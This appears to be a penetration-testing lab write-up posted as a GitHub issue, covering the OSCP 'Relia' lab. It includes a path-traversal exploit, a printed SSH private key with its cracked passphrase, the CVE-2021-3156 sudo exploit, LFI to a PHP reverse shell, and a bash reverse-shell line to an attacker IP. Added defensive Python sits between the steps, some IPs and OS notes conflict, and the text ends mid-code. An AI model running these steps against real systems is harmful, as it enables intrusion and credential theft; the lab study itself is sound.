WDavid404 / OSCP


Challenge Lab2 - Relia #28

Open WDavid404 opened 8 months ago

WDavid404 commented 8 months ago

Env

172.16.113.6
172.16.113.7
172.16.113.21
172.16.113.19
172.16.113.15
172.16.113.30
172.16.113.14
172.16.113.20

192.168.223.191
192.168.223.189

192.168.223.249
192.168.223.248
192.168.223.247
192.168.223.246
192.168.223.245
192.168.223.250  -  offsec / lab

nmap -sV -T5 192.168.223.245-249 192.168.223.189 192.168.223.191

Nmap scan report for 192.168.223.189
PORT      STATE    SERVICE       VERSION
25/tcp    open     smtp          hMailServer smtpd
99/tcp    filtered metagram
110/tcp   open     pop3          hMailServer pop3d
135/tcp   open     msrpc?
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open     imap          hMailServer imapd
445/tcp   open     microsoft-ds?
587/tcp   open     smtp          hMailServer smtpd
1026/tcp  filtered LSA-or-nterm
1030/tcp  filtered iad1
1059/tcp  filtered nimreg
1187/tcp  filtered alias
2005/tcp  filtered deslogin
2222/tcp  filtered EtherNetIP-1
3006/tcp  filtered deslogind
3030/tcp  filtered arepa-cas
3300/tcp  filtered ceph
3784/tcp  filtered bfd-control
3878/tcp  filtered fotogcad
5221/tcp  filtered 3exmp
5961/tcp  filtered unknown
6788/tcp  filtered smc-http
6969/tcp  filtered acmsoda
8031/tcp  filtered unknown
8042/tcp  filtered fs-agent
8654/tcp  filtered unknown
12345/tcp filtered netbus
Service Info: Host: MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.191
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 10.0
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ssl/ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.245
Host is up (0.090s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 2.0.8 or later
80/tcp    open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
301/tcp   filtered unknown
443/tcp   open     ssl/https    Apache/2.4.49 (Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8
1061/tcp  filtered kiosk
1092/tcp  filtered obrpd
1658/tcp  filtered sixnetudr
1761/tcp  filtered landesk-rc
1998/tcp  filtered x25-svc-port
2222/tcp  open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3689/tcp  filtered rendezvous
4111/tcp  filtered xgrid
7201/tcp  filtered dlip
8000/tcp  open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
8181/tcp  filtered intermapper
8402/tcp  filtered abarsd
9100/tcp  filtered jetdirect
9878/tcp  filtered kca-service
19101/tcp filtered unknown
44501/tcp filtered unknown
49175/tcp filtered unknown
50800/tcp filtered unknown
Service Info: Host: RELIA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.223.246
Host is up (0.091s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      VERSION
30/tcp    filtered unknown
80/tcp    open     http         Apache httpd 2.4.52 ((Ubuntu))
443/tcp   open     ssl/https    Apache/2.4.52 (Ubuntu)
1296/tcp  filtered dproxy
2222/tcp  open     ssh          OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
3003/tcp  filtered cgms
3030/tcp  filtered arepa-cas
3128/tcp  filtered squid-http
3211/tcp  filtered avsecuremgmt
4343/tcp  filtered unicall
5961/tcp  filtered unknown
6009/tcp  filtered X11:9
8200/tcp  filtered trivnet1
10566/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.223.247
Host is up (0.091s latency).
Not shown: 975 closed tcp ports (conn-refused)
PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
211/tcp   filtered 914c-g
443/tcp   open     ssl/http       Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
445/tcp   open     microsoft-ds?
990/tcp   filtered ftps
992/tcp   filtered telnets
1072/tcp  filtered cardax
1201/tcp  filtered nucleus-sand
1218/tcp  filtered aeroflight-ads
1864/tcp  filtered paradym-31
3389/tcp  open     ms-wbt-server  Microsoft Terminal Services
4321/tcp  filtered rwhois
5214/tcp  filtered unknown
5801/tcp  filtered vnc-http-1
5910/tcp  filtered cm
6129/tcp  filtered unknown
8045/tcp  filtered unknown
9418/tcp  filtered git
16000/tcp filtered fmsas
19101/tcp filtered unknown
48080/tcp filtered unknown
64623/tcp filtered unknown
65389/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.248
Host is up (0.090s latency).
Not shown: 958 closed tcp ports (conn-refused), 37 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.249
Host is up (0.091s latency).
Not shown: 970 closed tcp ports (conn-refused)
PORT      STATE    SERVICE         VERSION
80/tcp    open     http            Microsoft IIS httpd 10.0
135/tcp   open     msrpc           Microsoft Windows RPC
139/tcp   open     netbios-ssn     Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
555/tcp   filtered dsf
1045/tcp  filtered fpitp
1064/tcp  filtered jstel
1098/tcp  filtered rmiactivation
1174/tcp  filtered fnet-remote-ui
1248/tcp  filtered hermes
1658/tcp  filtered sixnetudr
1935/tcp  filtered rtmp
2035/tcp  filtered imsldoc
2394/tcp  filtered ms-olap2
3389/tcp  open     ms-wbt-server   Microsoft Terminal Services
3920/tcp  filtered exasoftport1
4848/tcp  filtered appserv-http
5510/tcp  filtered secureidprop
5802/tcp  filtered vnc-http-2
6567/tcp  filtered esp
8000/tcp  filtered http-alt
8181/tcp  filtered intermapper
8649/tcp  filtered unknown
9000/tcp  filtered cslistener
15003/tcp filtered unknown
16113/tcp filtered unknown
27353/tcp filtered unknown
34572/tcp filtered unknown
44443/tcp filtered coldfusion-auth
61900/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
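
The -sV report above is long enough that a small parser pays off when the same scan is repeated against several hosts. This is an added example, not part of the write-up: it turns nmap's text report into per-host open ports and the OS hint, and flags services nmap could not fingerprint (names ending in "?"), which is where the later full-port and manual checks went. The sample is an excerpt of the scan output on this page.

```python
"""Summarise nmap -sV text output per host.  Added example, not part of the
original write-up; SAMPLE_SCAN is an excerpt of the report on this page."""
import re
from typing import Dict, List

SAMPLE_SCAN = """\
Nmap scan report for 192.168.223.191
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 10.0
135/tcp  open  msrpc              Microsoft Windows RPC
445/tcp  open  microsoft-ds?
3389/tcp open  ssl/ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.245
Host is up (0.090s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 2.0.8 or later
80/tcp    open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
301/tcp   filtered unknown
2222/tcp  open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: Host: RELIA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
OS_RE = re.compile(r"OS: ([^;]+)")


def parse_nmap(text: str) -> Dict[str, dict]:
    """Map each scanned host to its open services and the OS hint nmap printed."""
    hosts: Dict[str, dict] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {"open": [], "os": None}
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, _proto, state, service, version = m.groups()
            if state == "open":  # filtered/closed ports are not services
                hosts[current]["open"].append((int(port), service, version.strip()))
            continue
        if line.startswith("Service Info:"):
            m = OS_RE.search(line)
            hosts[current]["os"] = m.group(1).strip() if m else None
    return hosts


def open_ports(hosts: Dict[str, dict], host: str) -> List[int]:
    return [port for port, _, _ in hosts[host]["open"]]


def unidentified(hosts: Dict[str, dict], host: str) -> List[int]:
    """Ports whose service name ends in '?': open, but nmap could not fingerprint
    them, so they deserve a manual banner check or a full -p- rescan."""
    return [port for port, svc, _ in hosts[host]["open"] if svc.endswith("?")]


def version_of(hosts: Dict[str, dict], host: str, port: int) -> str:
    for p, _, version in hosts[host]["open"]:
        if p == port:
            return version
    raise KeyError(port)


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_SCAN)
    for host, info in scan.items():
        print(host, info["os"], open_ports(scan, host), "unidentified:", unidentified(scan, host))
```

Feed it the saved output of the scan (`nmap -sV ... -oN scan.txt`) and the "unidentified" list is the short list to revisit with a slower, full-port scan, as the later comments on .247 and .249 had to do.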
WDavid404 commented 8 months ago

Recon

192.168.x.250

xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore --> offsec has admin rights.

powershell -ep bypass .\windowsEnum.ps1 > result.txt
net user /domain -----> This host doesn't connect to 127.16.x.x and it is not in AD.

192.168.223.245

Nmap scan report for 192.168.223.245
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 2.0.8 or later
80/tcp    open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
443/tcp   open     ssl/https    Apache/2.4.49 (Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8
2222/tcp  open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8000/tcp  open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)

OS: Windows

searchsploit vsftpd --> no useful info for windows os

We can login to FTP via anonymous --> No file there.

searchsploit apache 2.4.49 ---> 50383.sh
bash 50383.sh target.txt /etc/passwd --->

...
offsec:x:1000:1000:Offsec Admin:/home/offsec:/bin/bash
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh
...

--> make a username list (users.txt)

Try to get their id_rsa file:
bash 50383.sh targets.txt /home/<username>/.ssh/id_rsa --> no info

bash 50383.sh target.txt /bin/sh id ----> no result info
bash 50383.sh targets.txt /bin/sh -c 'bash -i >& /dev/tcp/192.168.45.193/4445 0>&1' ----> doesn't work

Home page --> Get some names:

try ssh -p2222 offsec@192.168.223.245 --> Failed: Permission denied (publickey)

=======> !!!! Try to get id_ecdsa instead of id_rsa: bash 50383.sh targets.txt /home/anita/.ssh/id_ecdsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAO+eRFhQ
13fn2kJ8qptynMAAAAEAAAAAEAAABoAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlz
dHAyNTYAAABBBK+thAjaRTfNYtnThUoCv2Ns6FQtGtaJLBpLhyb74hSOp1pn0pm0rmNThM
fArBngFjl7RJYCOTqY5Mmid0sNJwAAAACw0HaBF7zp/0Kiunf161d9NFPIY2bdCayZsxnF
ulMdp1RxRcQuNoGPkjOnyXK/hj9lZ6vTGwLyZiFseXfRi8Dd93YsG0VmEOm3BWvvCv+26M
8eyPQgiBD4dPphmNWZ0vQJ6qnbZBWCmRPCpp2nmSaT3odbRaScEUT5VnkpxmqIQfT+p8AO
CAH+RLndklWU8DpYtB4cOJG/f9Jd7Xtwg3bi1rkRKsyp8yHbA+wsfc2yLWM=
-----END OPENSSH PRIVATE KEY-----

---> copy the key above into the 'ecdsa_anita' file
$ chmod 600 ecdsa_anita
$ ssh -i ecdsa_anita anita@192.168.249.245 -p2222 ---> Enter passphrase for key 'ecdsa_anita':
----> ssh2john ecdsa_anita > ssh_anita.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_anita.hash ---> fireball

----> SSH login!!

192.168.x.246

A code verification page. Try ' order by 10--// --> doesn't work.

index.html --->

192.168.x.247

Got info: "relia.com" ----> Email address would be username@relia.com

Wappalyzer: php 8.1.10 ---> searchsploit php 8.1.10

192.168.x.248

Login page ----------> Maybe we can try the user list (users.txt) + hydra ?

gobuster dir -u http://192.168.189.248 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---->
/admin (Status: 302) [Size: 164] [--> http://192.168.189.248/Login?returnurl=%2fadmin]
/Admin (Status: 302) [Size: 164] [--> http://192.168.189.248/Login?returnurl=%2fAdmin]
/ADMIN (Status: 302) [Size: 164] [--> http://192.168.189.248/Login?returnurl=%2fADMIN]
/favicon.ico (Status: 200) [Size: 5430]
/home (Status: 301) [Size: 140] [--> http://192.168.189.248/]
/Home (Status: 301) [Size: 140] [--> http://192.168.189.248/]
/host (Status: 302) [Size: 183] [--> http://192.168.189.248/Host/ctl/Login/portalid/0?returnurl=%2fhost]
/Login (Status: 200) [Size: 23091]
/login (Status: 200) [Size: 23091]
/logoff (Status: 302) [Size: 140] [--> http://192.168.189.248/]
/privacy (Status: 200) [Size: 33566]
/Privacy (Status: 200) [Size: 33566]
/register (Status: 302) [Size: 167] [--> http://192.168.189.248/Login?returnurl=%2fregister]
/robots.txt (Status: 200) [Size: 741]
/searchresults (Status: 301) [Size: 154] [--> http://192.168.189.248/Search-Results]
/search-results (Status: 200) [Size: 32372]
/terms (Status: 200) [Size: 51543]

------> /privacy page ---> get info: emma@relia.com ---> add 'emma' to our user list.

192.168.x.249

A normal default IIS page.

gobuster dir -u http://192.168.189.249/ -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---> No info

So maybe we need to access it via RDP, but offsec/lab cannot RDP into it.

192.168.x.191

A login window ----------> Maybe we can try the user list (users.txt) + hydra ?
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.223.191 http-get -----> No result after a while

So maybe we need to access it via RDP, but offsec/lab cannot RDP into it.

=================>

crackmapexec smb 192.168.223.245-250 192.168.223.189 192.168.223.191 -u offsec -d relia.COM -p "lab" --shares ---->

SMB         192.168.223.189 445    MAIL             [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.249 445    LEGACY           [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.248 445    EXTERNAL         [+] relia.COM\offsec:lab 
SMB         192.168.223.191 445    LOGIN            [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.250 445    WINPREP          [+] relia.COM\offsec:lab 
SMB         192.168.223.247 445    WEB02            [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.250 445    WINPREP          [+] Enumerated shares
SMB         192.168.223.250 445    WINPREP          Share           Permissions     Remark
SMB         192.168.223.250 445    WINPREP          -----           -----------     ------
SMB         192.168.223.250 445    WINPREP          ADMIN$                          Remote Admin
SMB         192.168.223.250 445    WINPREP          C$                              Default share
SMB         192.168.223.250 445    WINPREP          IPC$            READ            Remote IPC
SMB         192.168.223.248 445    EXTERNAL         [+] Enumerated shares
SMB         192.168.223.248 445    EXTERNAL         Share           Permissions     Remark
SMB         192.168.223.248 445    EXTERNAL         -----           -----------     ------
SMB         192.168.223.248 445    EXTERNAL         ADMIN$                          Remote Admin
SMB         192.168.223.248 445    EXTERNAL         C$                              Default share
SMB         192.168.223.248 445    EXTERNAL         IPC$            READ            Remote IPC
SMB         192.168.223.248 445    EXTERNAL         transfer        READ,WRITE      
SMB         192.168.223.248 445    EXTERNAL         Users           READ            

smbclient //192.168.223.248/Users --user=relia.com/offsec%lab ---> no useful info (rabbit hole)

smbclient //192.168.223.248/transfer --user=relia.com/offsec%lab ----> no useful info (rabbit hole)
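
An added example, not from the write-up or the lab: the key recovered above was passphrase-protected, yet a wordlist cracked it in seconds. The script below reads only the public header of the openssh-key-v1 container (cipher, KDF, bcrypt rounds, key type) so an audit of keys on disk can tell whether a key is protected at all and how much work each passphrase guess costs. The sample input is the key printed above; make_unencrypted_header() constructs a dummy, unprotected container with no real key material so the other branch can be exercised.

```python
"""Report whether an OpenSSH-format private key is passphrase-protected and
how it is protected, from the container header only.  Added example; the
sample key is the one shown in this write-up, the plaintext one is constructed."""
import base64
import struct

PEM_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_END = "-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"

ANITA_KEY = """\
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAO+eRFhQ
13fn2kJ8qptynMAAAAEAAAAAEAAABoAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlz
dHAyNTYAAABBBK+thAjaRTfNYtnThUoCv2Ns6FQtGtaJLBpLhyb74hSOp1pn0pm0rmNThM
fArBngFjl7RJYCOTqY5Mmid0sNJwAAAACw0HaBF7zp/0Kiunf161d9NFPIY2bdCayZsxnF
ulMdp1RxRcQuNoGPkjOnyXK/hj9lZ6vTGwLyZiFseXfRi8Dd93YsG0VmEOm3BWvvCv+26M
8eyPQgiBD4dPphmNWZ0vQJ6qnbZBWCmRPCpp2nmSaT3odbRaScEUT5VnkpxmqIQfT+p8AO
CAH+RLndklWU8DpYtB4cOJG/f9Jd7Xtwg3bi1rkRKsyp8yHbA+wsfc2yLWM=
-----END OPENSSH PRIVATE KEY-----
"""


def _u32(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return n, off + 4


def _string(buf: bytes, off: int):
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n


def inspect_openssh_key(pem: str) -> dict:
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if lines[0] != PEM_BEGIN or lines[-1] != PEM_END:
        raise ValueError("not an OpenSSH-format private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad magic")
    off = len(MAGIC)
    cipher, off = _string(blob, off)      # 'none' means no passphrase at all
    kdf, off = _string(blob, off)         # 'bcrypt' or 'none'
    kdfopts, off = _string(blob, off)     # for bcrypt: string salt + uint32 rounds
    nkeys, off = _u32(blob, off)
    pubkey, off = _string(blob, off)      # public key blob; first string is the type
    keytype, _ = _string(pubkey, 0)
    rounds = None
    if kdf == b"bcrypt":
        _salt, o = _string(kdfopts, 0)
        rounds, _ = _u32(kdfopts, o)
    return {
        "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds,
        "encrypted": cipher != b"none", "nkeys": nkeys, "keytype": keytype.decode(),
    }


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def make_unencrypted_header(keytype: bytes = b"ssh-ed25519") -> str:
    """Constructed container with cipher/kdf 'none' and dummy key bytes."""
    pub = _ssh_string(keytype) + _ssh_string(b"\x00" * 32)
    blob = (MAGIC + _ssh_string(b"none") + _ssh_string(b"none") + _ssh_string(b"")
            + struct.pack(">I", 1) + _ssh_string(pub) + _ssh_string(b""))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{PEM_BEGIN}\n{body}\n{PEM_END}\n"


if __name__ == "__main__":
    print(inspect_openssh_key(ANITA_KEY))
    print(inspect_openssh_key(make_unencrypted_header()))
```

For this key the header reads aes256-ctr / bcrypt with 16 rounds, which is the ssh-keygen default; the protection held up only as long as the passphrase was not in rockyou.txt. The defensive takeaways are a passphrase that is not a dictionary word, a higher round count (`ssh-keygen -a`), and not leaving keys readable by a web server process in the first place.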

WDavid404 commented 8 months ago

192.168.223.245

ssh -i ecdsa_anita anita@192.168.249.245 -p2222 (Enter passphrase for key 'ecdsa_anita': fireball) ---> Login successful. ----> find local.txt

ip addr ---> It doesn't connect to 172.16.x.x

$ find / -perm -u=s -type f 2>/dev/null --->
/usr/bin/at
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/su
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
----> No useful info..

Try linpeas.sh

wget -qc http://192.168.45.193:9001/linpeas.sh
chmod a+x linpeas.sh
./linpeas.sh ---->

searchsploit sudo 1.8.31 ---> No info

Google sudo 1.8.31 --> CVE-2021-3156 --> https://github.com/blasty/CVE-2021-3156
[Kali] git clone https://github.com/blasty/CVE-2021-3156.git
[Victim] wget -r --no-parent http://192.168.45.193:9001/CVE-2021-3156

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich  --> To list option and details
$ ./sudo-hax-me-a-sandwich 1

----> NICE, we got root!! ----> Got proof.txt

Regarding /etc/passwd and /etc/shadow ---> cannot crack them.


Lesson
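
Added example, not from the write-up: the sudo finding above came from matching a version string by hand. The check below does the same against the ranges from the sudo advisory for CVE-2021-3156 (legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1 affected; fixed in 1.9.5p2). The banner strings are constructed, and the comparison is on upstream numbers only, which is a known limitation discussed after the code.

```python
"""Version-range check for CVE-2021-3156 (sudo 'Baron Samedit').  Added example,
not from the write-up; ranges are the ones published in the sudo advisory."""
import re

AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),   # legacy branch: 1.8.2 .. 1.8.31p2
    ((1, 9, 0, 0), (1, 9, 5, 1)),    # stable branch: 1.9.0 .. 1.9.5p1
]
FIXED_IN = (1, 9, 5, 2)
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b")


def parse_sudo_version(banner: str):
    """'Sudo version 1.8.31' -> (1, 8, 31, 0); '1.9.5p2' -> (1, 9, 5, 2).
    The 'p' patch level sorts after the bare release, matching sudo's numbering."""
    m = VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"no version number found in {banner!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def upstream_affected(version) -> bool:
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def assess(banner: str) -> dict:
    v = parse_sudo_version(banner)
    return {
        "version": v,
        "upstream_affected": upstream_affected(v),
        "fixed_in": FIXED_IN,
        # Distribution packages often backport the fix without bumping the
        # upstream number, so a hit here is a prompt to check the package changelog.
        "note": "confirm against the distribution package changelog",
    }


if __name__ == "__main__":
    for banner in ("Sudo version 1.8.31", "Sudo version 1.9.5p2", "Sudo version 1.8.32"):
        print(banner, "->", assess(banner))
```

On the lab host this returns affected for 1.8.31, which matches the outcome above. On a patched Ubuntu the same `sudo --version` line can still read 1.8.31 (the fix lives in the package revision), so the advisory's non-destructive test is the better confirmation: run `sudoedit -s /` as an unprivileged user; a vulnerable build answers with an error starting "sudoedit:", a patched build prints a "usage:" message.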

WDavid404 commented 8 months ago

192.168.223.246

ssh -i ecdsa_anita anita@192.168.249.246 -p2222 (Enter passphrase for key 'ecdsa_anita': fireball) ---> Login successful. ----> find local.txt

ip addr ---> It doesn't connect to 172.16.x.x

$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/sudo
/usr/libexec/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

----> No useful info

$ env

USER=anita
SSH_CLIENT=192.168.45.193 57376 2222
XDG_SESSION_TYPE=tty
HOME=/home/anita
MOTD_SHOWN=pam
OLDPWD=/home/anita
SSH_TTY=/dev/pts/0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
LOGNAME=anita
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/home
SSH_CONNECTION=192.168.45.193 57376 192.168.249.246 2222
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop

---->No useful info

Try linpeas.sh

wget -qc http://192.168.45.193:9001/linpeas.sh
chmod a+x linpeas.sh
./linpeas.sh ----> Writable folder: /dev/shm

There is a service using 8000 on local 127.0.0.1:8000 ---> Set up a chisel tunnel to access port 8000

[Kali] ./chisel server -p 8000 --reverse
[Victim] wget -qc http://192.168.45.243:9001/OSCP-Tools/chisel
chmod a+x chisel
./chisel client 192.168.45.243:8000 R:1080:socks
[Kali] proxychains -q firefox http://127.0.0.1:8000 --> it works: firefox can open and show the webpage.
However, proxychains -q gobuster dir -u http://127.0.0.1:8000 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---> no useful info..........

Using another method:
[Kali] ssh -N -L 7000:127.0.0.1:8000 -i ecdsa_anita -p 2222 anita@192.168.246.246 -> Open 127.0.0.1:7000 --> it works

gobuster dir -u http://127.0.0.1:7000 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config -> find /backend/

Access '127.0.0.1:7000/backend' --> page open as 'http://127.0.0.1:7000/backend/?view=user.inc' ---> This URL shows LFI ! (https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion)

nikto -Display 1234EP -o report.html -Format htm -Tuning 123bde -host http://127.0.0.1:7000/backend ---> no useful info

Utilize LFI on 246's port 8000:

http://127.0.0.1:7000/backend/?view=../../../../../etc/passwd (http://127.0.0.1:8000/backend/?view=../../../../../../../../../../../../../../../../etc/passwd also works) --> can get info

prepare test.php file under /tmp and a test1.php under /dev/shm --> works on http://127.0.0.1:7000/backend/?view=../../../../../dev/shm/test1.php

[Kali] Prepare a php reverse shell file: http://pentestmonkey.net/tools/php-reverse-shell and change LHOST and LPORT.
[Victim] wget -qc http://192.168.45.243:9001/OSCP-Tools/php-reverse-shell.php
[Kali] Access 'http://127.0.0.1:7000/backend/?view=../../../../../dev/shm/php-reverse-shell.php' ----> Get reverse shell from Victim as www-data

sudo su ---> we got root! ---> got proof.txt

Regarding the etc/passwd and shadow, ---> cannot crack them.


Lesson
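
Added example, not the lab's code: the `?view=` parameter above was resolved straight into an include, so `../../../../../etc/passwd` and a file dropped in the world-writable /dev/shm were both pulled in. The Python below models that resolution: resolve_unsafe() reproduces the weakness, resolve_safe() confines the view to an allow-listed directory and extension, and suspicious_requests() is the detection side, run over constructed access-log lines mirroring the requests on this page. VIEW_DIR is an assumed location for the legitimate *.inc views.

```python
"""Path-confinement for a 'view' include parameter, plus log-side detection of
the requests that abuse it.  Added example; VIEW_DIR and the log lines are
constructed, not taken from the lab."""
import posixpath
import re
from urllib.parse import unquote

VIEW_DIR = "/var/www/backend/views"  # assumption: where the legitimate *.inc views live


def resolve_unsafe(view: str) -> str:
    """What include(VIEW_DIR . '/' . $_GET['view']) amounts to: '..' segments
    are honoured, so any file the web user can read gets included."""
    return posixpath.normpath(posixpath.join(VIEW_DIR, view))


def resolve_safe(view: str, allowed_ext=(".inc",)) -> str:
    """Hardened form: the normalised path must stay under VIEW_DIR and carry an
    allowed extension; anything else raises instead of being included."""
    if "\x00" in view:
        raise ValueError("null byte in view name")
    candidate = posixpath.normpath(posixpath.join(VIEW_DIR, view))
    # commonpath, not startswith: '/var/www/backend/views2/x' must not pass.
    if posixpath.commonpath([VIEW_DIR, candidate]) != VIEW_DIR:
        raise ValueError(f"view escapes {VIEW_DIR}: {view!r}")
    if not candidate.endswith(allowed_ext):
        raise ValueError(f"extension not allowed: {view!r}")
    return candidate


def is_blocked(view: str) -> bool:
    try:
        resolve_safe(view)
    except ValueError:
        return True
    return False


# Constructed access-log lines: one legitimate view, one /etc/passwd read, one
# URL-encoded traversal into /dev/shm (the pattern used for the shell above).
ACCESS_LOG = """\
127.0.0.1 - - [27/Mar/2024:01:44:52 +0000] "GET /backend/?view=user.inc HTTP/1.1" 200 512
127.0.0.1 - - [27/Mar/2024:01:45:10 +0000] "GET /backend/?view=../../../../../etc/passwd HTTP/1.1" 200 2043
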